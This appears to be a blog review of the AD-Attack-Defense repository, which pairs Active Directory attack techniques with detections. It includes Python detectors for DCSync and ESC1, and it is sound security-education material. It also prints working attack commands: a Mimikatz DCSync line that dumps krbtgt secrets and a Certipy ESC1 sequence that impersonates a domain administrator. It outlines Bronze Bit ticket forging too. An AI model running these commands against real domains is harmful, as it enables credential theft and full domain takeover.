AD-Attack-Defense: The MITRE ATT&CK Navigation System for Active Directory Security
Hook
Active Directory compromise features in a large share of enterprise breaches, yet most organizations lack a structured framework for understanding both sides of the AD security equation, and attackers exploit that asymmetry daily.
Context
Active Directory remains the backbone of enterprise identity infrastructure, powering authentication and authorization for organizations worldwide. Despite decades of maturity, AD continues to be the crown jewel target for adversaries because compromising it means game over—total domain control, lateral movement capabilities, and persistent access across the entire network. The security community produces excellent research on both offensive techniques and defensive controls, but this knowledge exists scattered across blog posts, conference presentations, GitHub repositories, and vendor documentation.
The AD-Attack-Defense repository emerged to solve this discoverability problem. Rather than force practitioners to rebuild their mental maps of AD security from fragmented sources, infosecn1nja created a centralized navigation system that organizes attack vectors and countermeasures by MITRE ATT&CK framework phases. Think of it as a well-curated security operations center (SOC) playbook meets a penetration tester's field manual—a structured knowledge base that helps both defenders prioritize hardening efforts and attackers understand the full spectrum of post-exploitation tradecraft. With nearly 5,000 GitHub stars, it's become a go-to reference that saves security teams from reinventing the reconnaissance wheel.
Technical Insight
The repository's architecture follows the MITRE ATT&CK Enterprise matrix, breaking down Active Directory attack chains into discrete tactical phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, and Exfiltration. Each phase contains a curated collection of attack techniques paired with detection strategies and mitigation controls, creating bidirectional visibility.
Take the Credential Access phase as a concrete example. The repository documents techniques like DCSync, where an adversary holding replication rights abuses the directory replication protocol (DRSUAPI, MS-DRSR) that domain controllers legitimately use among themselves to pull password hashes and Kerberos keys for any account. A typical DCSync attack uses Mimikatz to pose as a domain controller requesting changes:
# Attacker perspective: DCSync to extract the krbtgt secrets
mimikatz # lsadump::dcsync /domain:corporate.local /user:krbtgt
# Requires a principal holding both the DS-Replication-Get-Changes and
# DS-Replication-Get-Changes-All control-access rights on the domain object
# (Domain Admins, Enterprise Admins and DC computer accounts hold them by default)
# Returns the NTLM hash and Kerberos AES keys for the target account
The defensive counterpart immediately follows, linking to detection methods such as monitoring Event ID 4662 (An operation was performed on an object) for Control Access requests (AccessMask 0x100) whose Properties field contains the replication control-access GUIDs, 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes-All, issued by a subject that is not a domain controller computer account. Collecting that event requires Directory Service Access auditing and a SACL on the domain naming context. It references Microsoft Advanced Threat Analytics rules, Sigma detection signatures, and Azure ATP (now Microsoft Defender for Identity) alerts that trigger on non-DC hosts requesting replication data.
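The 4662-based detection described above, as an added example that is not code from the repository or from any of the products it links to. The event records are constructed samples shaped like the fields a SIEM extracts from 4662; the domain controller account names and the Azure AD Connect allowlist entry are assumptions for the example.

```python
"""Flag DCSync-style replication requests in Windows Security Event ID 4662.

Added example, not code from the AD-Attack-Defense repository. The event
records below are constructed samples shaped like the fields a SIEM extracts
from 4662 (SubjectUserName, AccessMask, Properties); the domain-controller
account list and the Azure AD Connect allowlist entry are assumptions.
"""
from dataclasses import dataclass

# Control-access-right GUIDs that appear in the 4662 Properties field when
# a replication request is authorized against the domain naming context.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

CONTROL_ACCESS_MASK = "0x100"  # AccessMask value logged for "Control Access"

# Assumptions for the example: legitimate replication sources in this domain.
# DC computer accounts always replicate; Azure AD Connect's MSOL_* account
# legitimately holds these rights when password hash sync is enabled.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}
REPLICATION_ALLOWLIST = KNOWN_DC_ACCOUNTS | {"MSOL_5c1f2a9e8b7d"}


@dataclass
class Event4662:
    subject_user: str   # SubjectUserName
    access_mask: str    # AccessMask, e.g. "0x100"
    properties: str     # raw Properties field, GUIDs in braces, one per line


def replication_rights(ev: Event4662) -> set:
    """Return the replication GUIDs present in the event's Properties field."""
    props = ev.properties.lower()
    return {g for g in REPLICATION_RIGHTS if g in props}


def is_suspicious_dcsync(ev: Event4662, allowlist=REPLICATION_ALLOWLIST) -> bool:
    """True when a Control Access grant carries replication rights for a
    principal that is not an expected replication source."""
    if ev.access_mask.lower() != CONTROL_ACCESS_MASK:
        return False
    if not replication_rights(ev):
        return False
    return ev.subject_user not in allowlist


def triage(events):
    """Return (subject, sorted replication GUIDs) for each suspicious event."""
    return [(ev.subject_user, sorted(replication_rights(ev)))
            for ev in events if is_suspicious_dcsync(ev)]


# Constructed sample events: the first mimics a DCSync run from a user account,
# the second a normal DC-to-DC replication, the third an unrelated 4662.
SAMPLE_EVENTS = [
    Event4662("jdoe", "0x100",
              "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"),
    Event4662("DC02$", "0x100",
              "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"),
    Event4662("jdoe", "0x10",
              "%%7684\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}"),
]

if __name__ == "__main__":
    for subject, guids in triage(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(guids)}")
```

The allowlist is the part that needs maintenance: a new domain controller or a re-created Azure AD Connect account will fire this rule until it is added, and an attacker who compromises an allowlisted account slips past it, so the rule is a complement to, not a replacement for, auditing who holds the two replication rights.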
The repository excels at covering emerging attack vectors that traditional AD security guidance misses. The ADCS (Active Directory Certificate Services) abuse section documents the privilege escalation paths SpecterOps published in its 2021 "Certified Pre-Owned" research, ESC1 through ESC8. ESC1, for instance, targets an enabled template that lets the enrollee supply the subject and SAN (the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in msPKI-Certificate-Name-Flag), carries an EKU usable for domain authentication, requires neither manager approval nor authorized signatures, and grants enrollment to low-privileged principals. The attacker simply requests a certificate with a privileged account's UPN in the SAN:
# Find templates that meet the ESC1 conditions (Certipy 4.x syntax)
certipy find -u lowpriv@corporate.local -p Password123 -dc-ip 10.0.0.1 -vulnerable -stdout
# Request a certificate with the domain admin's UPN in the SAN
# (add -target <CA host> if the CA does not run on the DC)
certipy req -u lowpriv@corporate.local -p Password123 -dc-ip 10.0.0.1 \
    -ca CORPORATE-DC-CA -template VulnerableTemplate \
    -upn administrator@corporate.local
# Authenticate as the DA via PKINIT with the certificate; returns a TGT and the NT hash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
The linked defensive guidance explains how to audit template flags and permissions with tools like PSPKIAudit, clear the "supply in the request" setting on templates that do not need it, require CA certificate manager approval where it is needed, restrict Enroll rights to the groups that actually use a template, and enable CA auditing so that Event ID 4886 (certificate requested) and 4887 (certificate issued) record who requested what, including any supplied SAN. This attack-defense pairing helps blue teams understand why specific hardening controls matter by showing the exact exploit they prevent.
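The ESC1 preconditions listed above, evaluated over template records, as an added example that is not code from the repository, Certipy or PSPKIAudit. The Template records are constructed to mirror the LDAP attributes those tools read from the Certificate Templates container; the template names, permission sets and the list of "low privileged" groups are assumptions.

```python
"""Evaluate AD CS certificate templates for the ESC1 conditions.

Added example, not code from the AD-Attack-Defense repository, Certipy or
PSPKIAudit. The Template records are constructed to mirror the LDAP
attributes those tools read from the Certificate Templates container
(msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature,
pKIExtendedKeyUsage) plus the principals holding Enroll on each template.
The template names and permission sets are assumptions.
"""
from dataclasses import dataclass

# msPKI-Certificate-Name-Flag bit: the requester supplies the subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests are pended for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make an issued certificate usable for domain authentication,
# plus Any Purpose. A template with no EKU at all is also usable.
AUTHENTICATION_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Assumption: groups treated as "low privileged" when they hold Enroll.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    enabled: bool                 # published on at least one CA
    name_flag: int                # msPKI-Certificate-Name-Flag
    enrollment_flag: int          # msPKI-Enrollment-Flag
    ra_signatures: int            # msPKI-RA-Signature
    ekus: tuple                   # pKIExtendedKeyUsage OIDs
    enroll_principals: frozenset  # principals granted Enroll


def esc1_conditions(t: Template) -> dict:
    """Each ESC1 precondition and whether this template meets it."""
    return {
        "enabled": t.enabled,
        "enrollee_supplies_subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": t.ra_signatures == 0,
        "authentication_eku": not t.ekus or bool(set(t.ekus) & AUTHENTICATION_EKUS),
        "low_priv_can_enroll": bool(t.enroll_principals & LOW_PRIV_PRINCIPALS),
    }


def is_esc1(t: Template) -> bool:
    """Exploitable only when every condition holds at once."""
    return all(esc1_conditions(t).values())


def audit(templates) -> list:
    """Names of templates that meet every ESC1 condition."""
    return [t.name for t in templates if is_esc1(t)]


# Constructed templates. The second uses name/enrollment flags like the
# built-in User template (UPN and e-mail are taken from AD, not supplied).
SAMPLE_TEMPLATES = [
    Template("VulnerableTemplate", True, 0x1, 0x0, 0,
             ("1.3.6.1.5.5.7.3.2",), frozenset({"Domain Users"})),
    Template("User", True, 0xA6000000, 0x29, 0,
             ("1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"),
             frozenset({"Domain Users"})),
    Template("WebServer", True, 0x1, 0x0, 0,
             ("1.3.6.1.5.5.7.3.1",), frozenset({"Domain Users"})),  # server auth only
    Template("AdminApproved", True, 0x1, 0x2, 0,
             ("1.3.6.1.5.5.7.3.2",), frozenset({"Domain Users"})),  # manager approval
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        failed = [k for k, ok in esc1_conditions(t).items() if not ok]
        print(f"{t.name}: {'ESC1' if not failed else 'not ESC1, blocked by ' + ', '.join(failed)}")
```

The per-condition dictionary is what makes this useful for remediation rather than just detection: the WebServer-style template is safe only because of its EKU, and the AdminApproved template only because of manager approval, so changing either setting during a later "cleanup" reintroduces ESC1 on a template that once audited clean.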
Another architectural strength is the repository's treatment of Kerberos attacks beyond simple Kerberoasting. It documents advanced techniques like the Bronze Bit attack (CVE-2020-17049), in which an attacker who holds a service account's key performs S4U2Self to obtain a service ticket for a user who is protected or otherwise not forwardable, decrypts that ticket with the compromised key, flips the Forwardable flag, re-encrypts it, and presents it in S4U2Proxy; before the patch the KDC did not verify that flag independently. The repository links to Jake Karnes's technical analysis at NetSPI and Microsoft's patch guidance, while noting that detecting these attacks requires analyzing ticket anomalies rather than relying solely on signature-based detection.
The Discovery phase documentation demonstrates practical enumeration workflows that map to real-world assessment methodologies. It progresses from low-noise techniques (analyzing DNS records, anonymous LDAP queries against rootDSE) through authenticated enumeration (using PowerView, BloodHound, ADRecon) to detection engineering guidance. For defenders, it explains which telemetry sources catch each enumeration technique: Directory Service Event ID 1644 (with Field Engineering diagnostic logging enabled) for the expensive LDAP searches that directory harvesting produces, Zeek/Suricata signatures for SMB enumeration, and Event ID 4662 with SACLs on high-value objects for reads of sensitive attributes.
What makes this repository particularly valuable for security architects is how it connects atomic techniques into kill chains. The Lateral Movement section doesn't just list individual methods like PsExec or DCOM execution—it explains how attackers chain credential theft (Mimikatz) with privilege escalation (token manipulation) and remote execution (WMI) to move laterally while evading detection. This systems thinking helps defenders understand that blocking a single technique rarely stops determined adversaries; defense-in-depth requires addressing multiple control points across the attack chain.
Gotcha
The repository's primary limitation stems from its core design choice: being a link aggregator rather than self-contained documentation. When external sources become unavailable (link rot), techniques effectively disappear from your reference library. You'll find dozens of dead links or paywalled content, particularly for older vulnerabilities. During incident response at 2 AM, clicking through to a 404 page when you need immediate guidance on detecting PrintNightmare exploitation feels like a critical failure.
The lack of environmental context creates another practical problem. The repository presents techniques as equally weighted—there's no prioritization framework to help you decide whether sAMAccountName spoofing or Zerologon poses a greater risk to your specific AD environment. A domain running Windows Server 2012 R2 domain controllers with legacy GPO configurations faces different threats than a fully patched 2022 environment with Credential Guard and LAPS deployed. Without tooling to filter techniques by your patch level, AD functional level, or deployed controls, you'll waste time hardening against exploits that don't apply while missing relevant threats. The repository also doesn't include hands-on lab exercises or test environments, meaning you can't validate detection rules or practice defensive techniques without building your own infrastructure from scratch.
Verdict
Use if you're an intermediate-to-advanced security practitioner building an Active Directory threat model, planning penetration tests, or developing detection engineering playbooks. This repository excels as a structured jumping-off point that saves hours of research by organizing community knowledge into logical attack chains, particularly valuable for red teams designing realistic adversary emulation scenarios and blue teams prioritizing defensive investments against modern AD threats. Skip if you need ready-to-run tools, self-contained step-by-step tutorials, or beginner-friendly explanations—the link-heavy format assumes you can independently evaluate and adapt external research. Also skip if you require up-to-date, always-available documentation during incident response; invest in commercial threat intelligence platforms or self-hosted knowledge bases instead.